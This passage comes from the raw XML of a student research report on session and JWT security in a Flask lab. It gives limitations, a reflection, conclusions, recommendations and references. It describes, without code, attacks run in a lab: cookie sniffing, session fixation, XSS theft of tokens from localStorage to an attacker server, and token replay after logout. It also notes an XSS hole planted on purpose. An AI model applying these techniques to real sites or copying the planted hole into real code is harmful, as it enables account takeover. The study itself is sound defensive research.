        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">4. Implement a server-side token deny-list keyed by jti.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Logout must have a server-side effect for stateless tokens. A deny-list in a fast key-value store adds one lookup per request. Combined with a short token lifetime (five to fifteen minutes) this reduces the exploitation window to negligible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">5. Treat XSS as a first-order session security concern.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS is the amplifier that converts a token storage mistake into persistent account takeover. Output escaping on all user-controlled content and a strict Content Security Policy should be applied even in applications that have addressed the four controls above, ensuring that a future XSS does not immediately compromise authentication state.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.4 Limitations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">The PoC is a purpose-built demonstration environment, not a production application.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The Docker Compose setup and minimal Flask application share characteristics with real applications but omit production concerns (load balancing, CDN, third-party integrations). Results cannot be extrapolated to a specific production application without re-evaluating the threat model in that context.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">The threat model excludes server-side compromise and TLS-level attacks.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> All four scenarios assume the server and its signing keys are not compromised. If the JWT_SECRET or session signer key were exposed, all token-based controls would fail regardless of the SECURE profile settings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">The study covers four vulnerability classes.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> There are additional session and token security concerns not covered: refresh token rotation, token binding, PKCE in OAuth flows, certificate pinning, and hardware-backed key storage. The selection was guided by ASVS L1 scope and available time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">The XSS sink is deliberate and artificial.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Scenario S3 relies on a stored XSS vulnerability intentionally introduced via the |safe filter. Real applications may not have this sink or may have more constrained sinks. The finding that localStorage is dangerous given XSS is valid regardless, but the specific reproduction steps depend on the presence of an injectable sink.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">External validation was limited to peer and teacher review.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The project did not include a review by an independent professional security auditor. The validation described in section 5.5 is appropriate for an academic project of this scope, but findings should be independently verified before being applied as policy in a commercial environment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.5 Reflection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">The living document format was effective but required discipline.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Combining the project plan, research findings, and final report into a single evolving document meant each sprint produced immediately usable content. The cost was that structural decisions in Sprint 1 constrained later additions without disrupting cross-references.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Starting with a working insecure implementation made the research concrete.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Building the INSECURE profile first and confirming that each attack scenario was reproducible before writing the analysis was the right sequencing. It avoided writing a theoretical analysis the evidence would not support, and made the Sprint 3 comparative evaluation straightforward.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">The Docker Compose isolation was valuable for repeatability.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Running the PoC in an isolated container network with a dedicated attacker container meant scenarios could be reset and re-run between sessions without residual state. This was especially important for session fixation (S2), where leftover session files would have confused the before/after comparison.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">BoK subjects applied.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Infrastructure (HTTP, cookies, TLS transport, HTTP response headers). Secure software development (OWASP ASVS, secure-by-default configuration, defence in depth including CSP and HSTS). Security testing (OWASP Testing Guide OTG-SESS test cases, evidence collection methodology, controlled attack execution). Risk management (CIA analysis, qualitative risk rating using the OWASP Risk Rating methodology). Research methodology (DOT framework combining Library, Field, Lab, Showroom, and Workshop methods).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">What would be done differently.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> More time would be allocated to Sprint 3 and specifically to the comparative evaluation. Adding structured curl output (timestamped request/response pairs) alongside screenshots would make the comparison easier to read. Additionally, scenario S3 would benefit from a reflected XSS variant to demonstrate that the token storage risk exists independently of the stored-XSS vector.
The research was presented to peers and the project supervisor during the Sprint 4 assessment. The presentation demonstrated a solid understanding of the topic, the research methodology, and the technical findings. Feedback identified three areas for improvement in future presentations. First, the level of technical detail was too high for a mixed audience; future presentations should focus on outcomes and impact rather than implementation specifics. Second, the presentation exceeded the ten-minute time limit; stricter time management and a tighter slide structure are needed. Third, reliance on presentation notes reduced audience engagement; practising the delivery in advance would allow for more direct interaction with the audience.
The research was presented to a group of peers and the project supervisor during the Sprint 4 assessment. The presentation demonstrated a solid understanding of the topic, the research methodology, and the technical findings. Feedback identified three areas for improvement in future presentations. First, the level of technical detail was too high for a mixed audience; future presentations should focus on outcomes and impact rather than implementation specifics, reserving technical depth for follow-up questions. Second, the presentation exceeded the ten-minute time limit; stricter time management and a tighter slide structure are needed. Third, reliance on presentation notes reduced audience engagement; practising the delivery in advance would allow for more direct interaction with the audience.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This chapter consolidates the research findings and answers the questions defined in section 2.4.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.1 Summary of findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The library research in section 4.2 established that the four vulnerability classes studied in this project — missing cookie security attributes, session fixation, insecure client-side token storage, and absent server-side revocation — are well-documented, commonly occurring, and practically exploitable without specialised knowledge or tooling. All four are classified in the OWASP ASVS V3 as required controls and appear in the OWASP Top 10 under A07:2021 (Identification and Authentication Failures).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The proof-of-concept confirmed that all four vulnerabilities are reproducible in a minimal application, and the Sprint 3 comparative evaluation confirmed that all four mitigations were fully effective.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">The comparative evaluation (section 5.2) confirmed that every mitigation was fully effective: none of the four attack scenarios succeeded against the SECURE profile. The CIA analysis (section 5.3) rated all vulnerabilities as HIGH impact on confidentiality and integrity. The risk analysis (section 5.4) showed risk reductions from HIGH or CRITICAL (INSECURE) to LOW or VERY LOW (SECURE) for all scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.2 Answers to the sub-questions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Each sub-question is answered below with the evidence available at the current sprint. Sections marked as partial will be completed in Sprint 4.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.2.1 Sub-question 1 — Most common vulnerabilities (partial)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The library research identified four vulnerability classes: missing cookie security attributes, session fixation, insecure JWT storage in localStorage, and absent server-side token revocation. All four are OWASP ASVS L1 findings and appear in OWASP Top 10 A07:2021.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.2.2 Sub-question 2 — Exploitation of insecure storage and transmission (partial)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Three exploitation paths were demonstrated in the lab: passive tcpdump capture of cookies over HTTP (S1), a one-line XSS payload exfiltrating the JWT from localStorage to an attacker server (S3), and token replay after logout returning HTTP 200 (S4). Evidence is in the evidence/S1–S4 directories.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.2.3 Sub-question 3 — Realistic and feasible attack scenarios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">All four scenarios (S1–S4) are documented in the OWASP Testing Guide (OTG-SESS-002/-003/-006/-009) and classified as ASVS L1 findings. Each was reproduced in the Docker lab environment using only browser DevTools, tcpdump, and curl, confirming that no specialised attacker capability is required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.2.4 Sub-question 4 — Security impact on CIA [to be completed in Sprint 4]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">All four vulnerabilities carry HIGH confidentiality and integrity impact because each results in a fully authenticated session or token that can be used to read and modify account data. Availability impact is LOW. Full details and per-scenario ratings are in section 5.3.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.2.5 Sub-question 5 — Most effective defensive measures [to be completed in Sprint 4]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">The comparative evaluation confirmed all four OWASP-recommended baseline controls from section 4.2.4 each neutralised the corresponding vulnerability completely. Ranked by implementation simplicity: (1) cookie security attributes (config-only), (2) session.clear() on login (one line), (3) HttpOnly cookie instead of localStorage (one branch), (4) jti deny-list (one DB lookup per request). All are available in standard Python/Flask libraries with negligible performance overhead.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.3 Answer to the main research question</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Main research question: how secure is token and session handling in modern web applications, and which implementation choices create or reduce vulnerabilities?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Based on the library research and the Sprint 2 design work, the answer in progress is as follows. Token and session handling in modern web applications is vulnerable to a class of well-understood, low-barrier attacks when developers omit a small set of standard security controls. The specific implementation choices that create vulnerability are: serving session cookies without the Secure, HttpOnly, and SameSite attributes; failing to regenerate session identifiers on login; storing bearer tokens in JavaScript-accessible browser storage; and omitting server-side revocation state for stateless tokens. Each of these choices in isolation creates a specific, demonstrable attack path. When multiple choices co-occur, the resulting exposure is compounded.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">The research confirms the preliminary conclusion: token and session handling in modern web applications is highly insecure when developers accept framework defaults without reviewing their security implications. The four vulnerabilities were each reproducible by accepting typical tutorial-level defaults. Conversely, all four were neutralised by configuration changes and approximately ten lines of code, with no architectural redesign required. The trade-off between security and implementation complexity is strongly favourable: risk drops from HIGH/CRITICAL to LOW across all scenarios at minimal implementation cost.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.4 Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The following recommendations are based on the library research and confirmed by the comparative evaluation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Always set Secure, HttpOnly, and SameSite on session cookies.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  These three attributes address distinct attack surfaces and can be set with a single line of configuration in any modern web framework.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Regenerate the session identifier on every login.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  Session fixation is completely prevented by issuing a new identifier at authentication. Most session management libraries provide this as a one-call operation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Do not store JWTs in localStorage.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  An HttpOnly, Secure cookie provides equivalent convenience for most use cases while removing the entire class of script-based exfiltration attacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:line="280"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Implement server-side revocation for stateless tokens.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  A deny-list keyed by the jti claim, checked on every protected request, ensures that logout has immediate effect. Short token lifetimes (5-15 minutes) limit the exposure window even if revocation fails.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">The empirical comparison confirms all four preliminary recommendations. The four SECURE profile controls were sufficient to neutralise every attack scenario in the study with no additional controls required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8. References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The following sources were consulted during the research. OWASP sources are referenced by the online edition current as of June 2026.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP Foundation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Top 10:2021</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — A01:2021 Broken Access Control; A07:2021 Identification and Authentication Failures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP Foundation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Application Security Verification Standard (ASVS) v4.0.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — V3 Session Management.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP Foundation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cheat Sheet Series</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Session Management, JSON Web Token, Cross-Site Scripting Prevention.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">M. Jones, J. Bradley, N. Sakimura. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">RFC 7519 — JSON Web Token (JWT)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. IETF, 2015.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A. Barth. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">RFC 6265 — HTTP State Management Mechanism</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. IETF, 2011.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MDN Web Docs. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Set-Cookie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Security-Policy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Web Storage API</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">NCSC-NL. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Responsible Disclosure Guideline</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP Foundation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Web Security Testing Guide (WSTG)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> v4.2, 2021. Test cases OTG-SESS-002, OTG-SESS-003, OTG-SESS-006, OTG-SESS-009. https://owasp.org/www-project-web-security-testing-guide/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kolsek, M. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Session Fixation Vulnerability in Web-based Applications.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Acros Security, 2002. https://owasp.org/www-community/attacks/Session_fixation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pallets Projects. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Flask — Web Development, One Drop at a Time.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> https://flask.palletsprojects.com/ (accessed June 2026).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PyJWT Contributors. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">PyJWT — JSON Web Tokens for Python.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> https://pyjwt.readthedocs.io/ (accessed June 2026).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Docker Inc. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Docker Compose Overview.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> https://docs.docker.com/compose/ (accessed June 2026).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kolodyazhniy, A. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">prp-token-session — Proof-of-concept repository.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> FHICT, 2026. https://github.com/Sertyg-a11/prp-token-session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jc w:val="left"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="555555"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">PRP — Token &amp; Session Handling Security</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="555555"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">	Andrii Kolodyazhniy · v1.0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Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1F3A68"/>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github.com/Sertyg-a11/prp-token-sessio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Analysis of Token and Session Handling in Modern Web Applications</dc:title>
  <dc:creator>Andrii Kolodyazhniy</dc:creator>
  <dc:description>Personal Research Project (PRP) — Living research report</dc:description>
  <cp:lastModifiedBy>Un-named</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-04T16:21:41.392Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-04T16:21:41.392Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>